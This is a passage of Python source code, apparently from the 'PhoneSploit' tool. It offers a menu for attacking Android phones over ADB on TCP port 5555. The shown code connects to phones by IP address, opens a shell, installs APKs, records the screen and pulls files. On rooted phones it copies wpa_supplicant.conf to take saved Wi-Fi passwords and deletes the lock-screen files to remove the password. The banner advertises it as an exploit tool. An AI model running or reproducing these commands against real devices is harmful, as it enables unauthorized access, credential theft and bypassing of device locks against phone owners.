Fore.RED) 60 | 61 | logo_design_2 = Fore.GREEN + ''' 62 | .;' `;, 63 | .;' ,;' `;, `;, {0}PhoneSploit 64 | .;' ,;' ,;' `;, `;, `;, 65 | :: :: : {1}( ){0} : :: :: {1}Coded by Zucccs / Metachar{0} 66 | ':. ':. ':. {1}/_\{0} ,:' ,:' ,:' 67 | ':. ':. {1}/___\{0} ,:' ,:' 68 | ':. {1}/_____\{0} ,:' 69 | {1}/ \\{0} 70 | '''.format(Fore.GREEN, Fore.WHITE, Fore.RED) 71 | 72 | logo_design_pre = ''' 73 | {0}╔═╗{1}┬ ┬┌─┐┌┐┌┌─┐{0}╔═╗{1}┌─┐┬ ┌─┐┬┌┬┐ 74 | {0}╠═╝{1}├─┤│ ││││├┤ {0}╚═╗{1}├─┘│ │ ││ │ 75 | {0}╩ {1}┴ ┴└─┘┘└┘└─┘{0}╚═╝{1}┴ ┴─┘└─┘┴ ┴ '''.format(Fore.GREEN, Fore.WHITE, Fore.RED) 76 | logo_design_3 = logo_design_pre.decode("utf-8") 77 | 78 | logo_design_4 = ''' 79 | \033[92m 80 | +hydNNNNdyh+ 81 | +mMMMMMMMMMMMMm+ 82 | `dMMm\033[0m:\033[92mNMMMMMMN\033[0m:\033[92mmMMd` 83 | hMMMMMMMMMMMMMMMMMMh 84 | \033[92m.. yyyyyyyyyyyyyyyyyyyy .. \033[0m Expoit time :) \033[92m 85 | \033[92m.mMMm`MMMMMMMMMMMMMMMMMMMM`mMMm. \033[0m Thanks for downloading!\033[92m 86 | \033[92m:MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 87 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 88 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 89 | :MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM: 90 | -MMMM-MMMMMMMMMMMMMMMMMMMM-MMMM- 91 | +yy+ MMMMMMMMMMMMMMMMMMMM +yy+ 92 | mMMMMMMMMMMMMMMMMMMm 93 | `/++MMMMh++hMMMM++/` 94 | MMMMo oMMMM 95 | MMMMo oMMMM 96 | oNMm- -mMNs''' 97 | 98 | page_1 = '''\n 99 | {0}[{1}1{0}] {2}Show Connected Devices {0}[{1}6{0}] {2}Screen record a phone {0}[{1}11{0}] {2}Uninstall an app 100 | {0}[{1}2{0}] {2}Disconect all devices {0}[{1}7{0}] {2}Screen Shot a picture on a phone {0}[{1}12{0}] {2}Show real time log of device 101 | {0}[{1}3{0}] {2}Connect a new phone {0}[{1}8{0}] {2}Restart Server {0}[{1}13{0}] {2}Dump System Info 102 | {0}[{1}4{0}] {2}Access Shell on a phone {0}[{1}9{0}] {2}Pull folders from phone to pc {0}[{1}14{0}] {2}List all apps on a phone 103 | {0}[{1}5{0}] {2}Install an apk on a phone {0}[{1}10{0}] {2}Turn The Device off {0}[{1}15{0}] {2}Run an app 104 | 105 | 106 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}p{0}] Next Page v1.2 107 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN) 108 | 109 | page_2 = '''\n 110 | {0}[{1}16{0}]{2} Port Forwarding {0}[{1}21{0}]{2} NetStat 111 | {0}[{1}17{0}]{2} Grab wpa_supplicant {0}[{1}22{0}]{2} Turn WiFi On/Off 112 | {0}[{1}18{0}]{2} Show Mac/Inet {0}[{1}23{0}]{2} Remove Password 113 | {0}[{1}19{0}]{2} Extract apk from app {0}[{1}24{0}]{2} Use Keycode 114 | {0}[{1}20{0}]{2} Get Battery Status {0}[{1}25{0}]{2} Get Current Activity 115 | 116 | 117 | {0}[{1}99{0}] {2}Exit {0}[{1}0{0}] {2}Clear {0}[{1}b{0}] Back to page one 118 | '''.format(Fore.CYAN, Fore.RED, Fore.GREEN) 119 | 120 | 121 | #============================= 122 | #Main 123 | def main(): 124 | page_num = 1 125 | option = raw_input(Fore.WHITE + "phonesploit"+Fore.RED + "(main_menu) "+Fore.WHITE + "> ") 126 | if option == '1': 127 | os.system("adb devices -l") 128 | elif option == '2': 129 | os.system("adb disconnect") 130 | elif option == '3': 131 | os.system("adb tcpip 5555") 132 | print (("\n[{0}+{1}] Enter a phones ip address.").format(Fore.RED, Fore.WHITE)) 133 | ip = raw_input (arrow+" phonesploit"+Fore.RED + "(connect_phone) "+Fore.WHITE + "> ") 134 | os.system("adb connect "+ip+":5555") 135 | 136 | elif option == '4': 137 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 138 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(shell_on_phone) "+Fore.WHITE + "> ") 139 | os.system("adb -s "+device_name+" shell") 140 | 141 | elif option == '5': 142 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 143 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ") 144 | print ((" "+connect)) 145 | print ((" [{0}+{1}]Enter the apk location.").format(Fore.RED, Fore.WHITE)) 146 | apk_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(apk_install) "+Fore.WHITE + "> ") 147 | os.system("adb -s "+device_name+" install "+apk_location) 148 | print (Fore.GREEN + "Apk has been installed.") 149 | 150 | elif option == '6': 151 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 152 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ") 153 | print ((" "+connect)) 154 | print ((" [{0}+{1}] Please wait 3m its recording").format(Fore.RED, Fore.WHITE)) 155 | print ((" "+connect)) 156 | os.system("adb -s "+device_name+" shell screenrecord /sdcard/demo.mp4") 157 | print ((" [{0}+{1}]Enter where you would like the video to be saved.").format(Fore.RED, Fore.WHITE)) 158 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screen_record) "+Fore.WHITE + "> ") 159 | os.system("adb -s "+device_name+" pull /sdcard/demo.mp4 "+place_location) 160 | 161 | elif option == '7': 162 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 163 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ") 164 | os.system("adb -s "+device_name+" shell screencap /sdcard/screen.png") 165 | print ((" "+connect)) 166 | print ((" [{0}+{1}]Enter where you would like the screenshot to be saved.").format(Fore.RED, Fore.WHITE)) 167 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(screenshot) "+Fore.WHITE + "> ") 168 | os.system("adb -s "+device_name+" pull /sdcard/screen.png "+place_location) 169 | 170 | elif option == '8': 171 | os.system("adb kill-server && adb start-server") 172 | 173 | elif option == '9': 174 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 175 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ") 176 | print ((" "+connect)) 177 | print ((" [{0}+{1}]Enter a file location on a device").format(Fore.RED, Fore.WHITE)) 178 | file_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ") 179 | print ((" "+connect)) 180 | print ((" [{0}+{1}]Enter where you would like the file to be saved.").format(Fore.RED, Fore.WHITE)) 181 | place_location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(file_pull) "+Fore.WHITE + "> ") 182 | os.system("adb -s "+device_name+" pull "+file_location+" "+place_location) 183 | 184 | elif option == '10': 185 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 186 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(device_reboot) "+Fore.WHITE + "> ") 187 | os.system("adb -s "+device_name+ " reboot ") 188 | 189 | elif option == '11': 190 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 191 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ") 192 | print ((" "+connect)) 193 | print ((" [{0}+{1}]Enter a package name.").format(Fore.RED, Fore.WHITE)) 194 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_delete) "+Fore.WHITE + "> ") 195 | os.system("adb -s "+device_name+" unistall "+package_name) 196 | 197 | elif option == '12': 198 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 199 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(log) "+Fore.WHITE + "> ") 200 | os.system('adb -s '+device_name+" logcat ") 201 | 202 | elif option == '13': 203 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 204 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(sys_info) "+Fore.WHITE + "> ") 205 | os.system("adb -s "+device_name+" dumpsys") 206 | 207 | elif option == '14': 208 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 209 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(package_manager) "+Fore.WHITE + "> ") 210 | os.system("adb -s " +device_name+ " shell pm list packages -f") 211 | main() 212 | 213 | elif option == '15': 214 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 215 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ") 216 | print ((" "+connect)) 217 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE)) 218 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(app_run) "+Fore.WHITE + "> ") 219 | os.system("adb -s "+device_name+" shell monkey -p "+package_name+" -v 500") 220 | main() 221 | 222 | elif option == '16': 223 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 224 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ") 225 | print ((" "+connect)) 226 | print ((" [{0}+{1}]Enter a port on the device.").format(Fore.RED, Fore.WHITE)) 227 | port_device = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ") 228 | print ((" "+connect)) 229 | print ((" [{0}+{1}]Enter a port to forward it too.").format(Fore.RED, Fore.WHITE)) 230 | forward_port = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(port_forward) "+Fore.WHITE + "> ") 231 | os.system("adb -s "+device_name+" forward tcp:"+port_device+" tcp:"+forward_port) 232 | 233 | elif option == '17': 234 | try: 235 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 236 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ") 237 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C").format(Fore.RED, Fore.WHITE)) 238 | print ((" "+connect)) 239 | print ((" [{0}+{1}]Enter where you want the file to be saved.").format(Fore.RED, Fore.WHITE)) 240 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(wpa_grab) "+Fore.WHITE + "> ") 241 | os.system("adb -s "+device_name+" shell "+"su -c 'cp /data/misc/wifi/wpa_supplicant.conf /sdcard/'") 242 | os.system("adb -s "+device_name+" pull /sdcard/wpa_supplicant.conf "+location) 243 | except KeyboardInterrupt: 244 | main() 245 | 246 | elif option == '18': 247 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 248 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(mac_inet) "+Fore.WHITE + "> ") 249 | os.system("adb -s " +device_name+ " shell ip address show wlan0") 250 | main() 251 | 252 | elif option == '19': 253 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 254 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 255 | print ((" "+connect)) 256 | print ((" [{0}+{1}]Enter a package name. They look like this --> com.snapchat.android").format(Fore.RED, Fore.WHITE)) 257 | package_name = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 258 | os.system("adb -s "+device_name+" shell pm path "+package_name) 259 | print ((" "+connect)) 260 | print ((" [{0}+{1}]Enter The path.looks like this /data/app/com.snapchat.android-qWgDcBiCEvANq6op_NPqeA==/base.apk").format(Fore.RED, Fore.WHITE)) 261 | path = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 262 | print ((" "+connect)) 263 | print ((" [{0}+{1}]Enter The location to store the apk: ") .format(Fore.RED, Fore.WHITE)) 264 | location = raw_input(" "+arrow + "phonesploit"+Fore.RED + "(pull_apk) "+Fore.WHITE + "> ") 265 | os.system("adb -s " +device_name+" pull "+path+" "+location) 266 | main() 267 | 268 | elif option == '20': 269 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 270 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(battery) "+Fore.WHITE + "> ") 271 | os.system("adb -s " +device_name+ " shell dumpsys battery") 272 | main() 273 | 274 | elif option == '21': 275 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 276 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(net_stat) "+Fore.WHITE + "> ") 277 | os.system("adb -s " +device_name+ " shell netstat") 278 | main() 279 | 280 | elif option == '22': 281 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 282 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(wifi) "+Fore.WHITE + "> ") 283 | print ((" "+connect)) 284 | print ((" [{0}+{1}] To turn wifi back on you need the device to be pluged in.").format(Fore.RED, Fore.WHITE)) 285 | print ((" "+connect)) 286 | on_off = raw_input(Fore.WHITE + " ["+Fore.RED+"+"+Fore.WHITE+"]Would you like the wifi "+Fore.GREEN +"on"+Fore.WHITE +"/"+Fore.RED +"off "+Fore.WHITE) 287 | if on_off == 'off': 288 | command = " shell svc wifi disable" 289 | else: 290 | command = " shell svc wifi enable" 291 | 292 | os.system("adb -s "+device_name+command) 293 | 294 | elif option == '23': 295 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 296 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(pass_remove) "+Fore.WHITE + "> ") 297 | print ((Fore.WHITE + " [{0}+{1}]{1}THE DEVICE NEEDS TO BE ROOTED TO CONTINUE TO EXIT USE CTRL +C THIS IS ALSO UNTESTED").format(Fore.RED, Fore.WHITE)) 298 | print ((" "+connect)) 299 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************") 300 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/gesture.key'") 301 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db'") 302 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-wal'") 303 | os.system("adb -s "+device_name+" shell su 0 'rm /data/system/locksettings.db-shm'") 304 | print (Fore.RED + "******************TRYING TO REMOVE PASS******************") 305 | 306 | elif option == '24': 307 | print (("[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 308 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ") 309 | print (''' 310 | 0 --> "KEYCODE_UNKNOWN" 311 | 1 --> "KEYCODE_MENU" 312 | 2 --> "KEYCODE_SOFT_RIGHT" 313 | 3 --> "KEYCODE_HOME" 314 | 4 --> "KEYCODE_BACK" 315 | 5 --> "KEYCODE_CALL" 316 | 6 --> "KEYCODE_ENDCALL" 317 | 7 --> "KEYCODE_0" 318 | 8 --> "KEYCODE_1" 319 | 9 --> "KEYCODE_2" 320 | 10 --> "KEYCODE_3" 321 | 11 --> "KEYCODE_4" 322 | 12 --> "KEYCODE_5" 323 | 13 --> "KEYCODE_6" 324 | 14 --> "KEYCODE_7" 325 | 15 --> "KEYCODE_8" 326 | 16 --> "KEYCODE_9" 327 | 17 --> "KEYCODE_STAR" 328 | 18 --> "KEYCODE_POUND" 329 | 19 --> "KEYCODE_DPAD_UP" 330 | 20 --> "KEYCODE_DPAD_DOWN" 331 | 21 --> "KEYCODE_DPAD_LEFT" 332 | 22 --> "KEYCODE_DPAD_RIGHT" 333 | 23 --> "KEYCODE_DPAD_CENTER" 334 | 24 --> "KEYCODE_VOLUME_UP" 335 | 25 --> "KEYCODE_VOLUME_DOWN" 336 | 26 --> "KEYCODE_POWER" 337 | 27 --> "KEYCODE_CAMERA" 338 | 28 --> "KEYCODE_CLEAR" 339 | 29 --> "KEYCODE_A" 340 | 30 --> "KEYCODE_B" 341 | 31 --> "KEYCODE_C" 342 | 32 --> "KEYCODE_D" 343 | 33 --> "KEYCODE_E" 344 | 34 --> "KEYCODE_F" 345 | 35 --> "KEYCODE_G" 346 | 36 --> "KEYCODE_H" 347 | 37 --> "KEYCODE_I" 348 | 38 --> "KEYCODE_J" 349 | 39 --> "KEYCODE_K" 350 | 40 --> "KEYCODE_L" 351 | 41 --> "KEYCODE_M" 352 | 42 --> "KEYCODE_N" 353 | 43 --> "KEYCODE_O" 354 | 44 --> "KEYCODE_P" 355 | 45 --> "KEYCODE_Q" 356 | 46 --> "KEYCODE_R" 357 | 47 --> "KEYCODE_S" 358 | 48 --> "KEYCODE_T" 359 | 49 --> "KEYCODE_U" 360 | 50 --> "KEYCODE_V" 361 | 51 --> "KEYCODE_W" 362 | 52 --> "KEYCODE_X" 363 | 53 --> "KEYCODE_Y" 364 | 54 --> "KEYCODE_Z" 365 | 55 --> "KEYCODE_COMMA" 366 | 56 --> "KEYCODE_PERIOD" 367 | 57 --> "KEYCODE_ALT_LEFT" 368 | 58 --> "KEYCODE_ALT_RIGHT" 369 | 59 --> "KEYCODE_SHIFT_LEFT" 370 | 60 --> "KEYCODE_SHIFT_RIGHT" 371 | 61 --> "KEYCODE_TAB" 372 | 62 --> "KEYCODE_SPACE" 373 | 63 --> "KEYCODE_SYM" 374 | 64 --> "KEYCODE_EXPLORER" 375 | 65 --> "KEYCODE_ENVELOPE" 376 | 66 --> "KEYCODE_ENTER" 377 | 67 --> "KEYCODE_DEL" 378 | 68 --> "KEYCODE_GRAVE" 379 | 69 --> "KEYCODE_MINUS" 380 | 70 --> "KEYCODE_EQUALS" 381 | 71 --> "KEYCODE_LEFT_BRACKET" 382 | 72 --> "KEYCODE_RIGHT_BRACKET" 383 | 73 --> "KEYCODE_BACKSLASH" 384 | 74 --> "KEYCODE_SEMICOLON" 385 | 75 --> "KEYCODE_APOSTROPHE" 386 | 76 --> "KEYCODE_SLASH" 387 | 77 --> "KEYCODE_AT" 388 | 78 --> "KEYCODE_NUM" 389 | 79 --> "KEYCODE_HEADSETHOOK" 390 | 80 --> "KEYCODE_FOCUS" 391 | 81 --> "KEYCODE_PLUS" 392 | 82 --> "KEYCODE_MENU" 393 | 83 --> "KEYCODE_NOTIFICATION" 394 | 84 --> "KEYCODE_SEARCH" 395 | 85 --> "TAG_LAST_KEYCODE" 396 | ''') 397 | print (("[{0}+{1}]Enter a number.").format(Fore.RED, Fore.WHITE)) 398 | num = raw_input(arrow + "phonesploit"+Fore.RED + "(keycode) "+Fore.WHITE + "> ") 399 | os.system("adb -s "+device_name+" shell input keyevent "+num) 400 | 401 | elif option == '25': 402 | print (("\n[{0}+{1}]Enter a device name.").format(Fore.RED, Fore.WHITE)) 403 | device_name = raw_input(arrow + "phonesploit"+Fore.RED + "(current_activity) "+Fore.WHITE + "> ") 404 | os.system("adb -s " +device_name+ " dumpsys activity") 405 | main() 406 | 407 | elif option == '0': 408 | global page2 409 | if page2 == True: 410 | clear(page_2) 411 | else: 412 | clear(page_1) 413 | 414 | elif option == 'p': 415 | os.system('clear') 416 | page2 = True 417 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4]) 418 | print (Fore.RED + banner_title) 419 | print (page_2) 420 | 421 | elif option == 'b': 422 | os.system('clear') 423 | page2 = False 424 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4]) 425 | print (Fore.RED + banner_title) 426 | print (page_1) 427 | 428 | elif option == '99': 429 | exit() 430 | 431 | 432 | main() 433 | 434 | #============================= 435 | 436 | def clear(page): 437 | global page2 438 | os.system('clear') 439 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4]) 440 | print (Fore.RED + banner_title) 441 | print (page) 442 | 443 | 444 | 445 | #============================= 446 | # Run 447 | yn = raw_input(Fore.WHITE + "Have you already installed adb via command line "+Fore.GREEN + "Y"+Fore.WHITE+"/"+Fore.RED+"N "+Fore.WHITE) 448 | if yn == "n": 449 | os.system("sudo apt install adb") 450 | print (Fore.RED + "Starting adb server..") 451 | os.system("adb tcpip 5555") 452 | t.sleep(4) 453 | os.system('clear') 454 | banner_title = random.choice([logo_design_1,logo_design_2,logo_design_3,logo_design_4]) 455 | print (Fore.RED + banner_title) 456 | print (page_1) 457 | main() 458 | --------------------------------------------------------------------------------